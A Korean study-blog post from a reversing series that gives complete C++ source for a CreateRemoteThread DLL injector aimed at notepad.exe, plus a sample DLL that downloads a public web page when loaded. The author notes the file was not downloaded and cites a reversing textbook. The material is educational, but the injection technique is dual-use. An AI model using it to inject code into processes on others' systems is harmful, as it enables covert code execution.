티스토리 뷰
Security&Hacking/Reversing
Reversing) DLL Injection with CreateRemoteThread()
os94 2019. 9. 11. 16:54[DLLInject.exe & MyHack.dll]
DLLInject.cpp
#include "stdio.h"
#include "windows.h"
#include "tlhelp32.h"
#define DEF_PROC_NAME ("notepad.exe")
#define DEF_DLL_PATH ("c:\\myhack.dll")
DWORD FindProcessID(LPCTSTR szProcessName);
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllName);
int main(int argc, char* argv[]) {
DWORD dwPID = 0xFFFFFFFF;
dwPID = FindProcessID(DEF_PROC_NAME);
if (dwPID == 0xFFFFFFFF) {
printf("There is no <%s> process!\n", DEF_PROC_NAME);
return 1;
}
InjectDll(dwPID, DEF_DLL_PATH);
return 0;
}
DWORD FindProcessID(LPCTSTR szProcessName) {
DWORD dwPID = 0xFFFFFFFF;
HANDLE hSnapShot = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe;
pe.dwSize = sizeof(PROCESSENTRY32);
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
Process32First(hSnapShot, &pe);
do {
if (!_stricmp(szProcessName, pe.szExeFile)) {
dwPID = pe.th32ProcessID;
break;
}
} while (Process32Next(hSnapShot, &pe));
CloseHandle(hSnapShot);
return dwPID;
}
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllName) {
HANDLE hProcess, hThread;
LPVOID pRemoteBuf;
DWORD dwBufSize = lstrlen(szDllName) + 1;
LPTHREAD_START_ROUTINE pThreadProc;
if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)))
return FALSE;
pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllName, dwBufSize, NULL);
pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}MyHack.cpp
// dllmain.cpp : DLL 응용 프로그램의 진입점을 정의합니다.
#include "stdafx.h"
#include "urlmon.h"
#include "stdio.h"
#include "windows.h"
#pragma comment(lib, "urlmon.lib")
#define DEF_NAVER_ADDR (L"http://www.naver.com/index.html")
#define DEF_INDEX_PATH (L"c:\\index.html")
DWORD WINAPI ThreadProc(LPVOID lParam) {
URLDownloadToFile(NULL, DEF_NAVER_ADDR, DEF_INDEX_PATH, 0, NULL);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
HANDLE hThread = NULL;
switch (fdwReason) {
case DLL_PROCESS_ATTACH:
hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
CloseHandle(hThread);
break;
}
return TRUE;
}* Process Explorer를 통해 Notepad.exe에 MyHack.dll이 injection된 것은 확인할 수 있으나, 해당경로에 index.html이 다운로드되진않음.
[참고자료]
- code from '리버싱 핵심원리' (교재 말고 아래링크.)
- http://reversecore.com/40?category=216978
- http://yongpa.tistory.com/18
- http://wendys.tistory.com/23
- https://asecurity.so/2017/01/hooking-%ED%9B%84%ED%82%B9-createremotethread/
'Security&Hacking > Reversing' 카테고리의 다른 글
| Reversing) MUP(Manual Unpacking) (0) | 2019.09.11 |
|---|---|
| Reversing) abex crackme #4 (0) | 2019.09.11 |
| Reversing) abex crackme #3 (0) | 2019.09.11 |
| Reversing) abex crackme #2 (0) | 2019.09.11 |
| Reversing) 기본 C문법 리버싱 (if문, for문) (0) | 2019.09.11 |
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
TAG
- Data Structure
- socket
- 리버싱
- sort
- 해외여행
- 프로그래머스
- OneToMany
- bfs
- javascript
- 회고
- git
- 웹해킹
- 우아한 테크코스
- Android Studio
- graph
- JPA
- mysql
- C
- Stack
- FRAGMENT
- 개발자
- reversing
- Algorithm
- brute-force
- Vo
- Android
- queue
- webhacking.kr
- dfs
- Java
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
글 보관함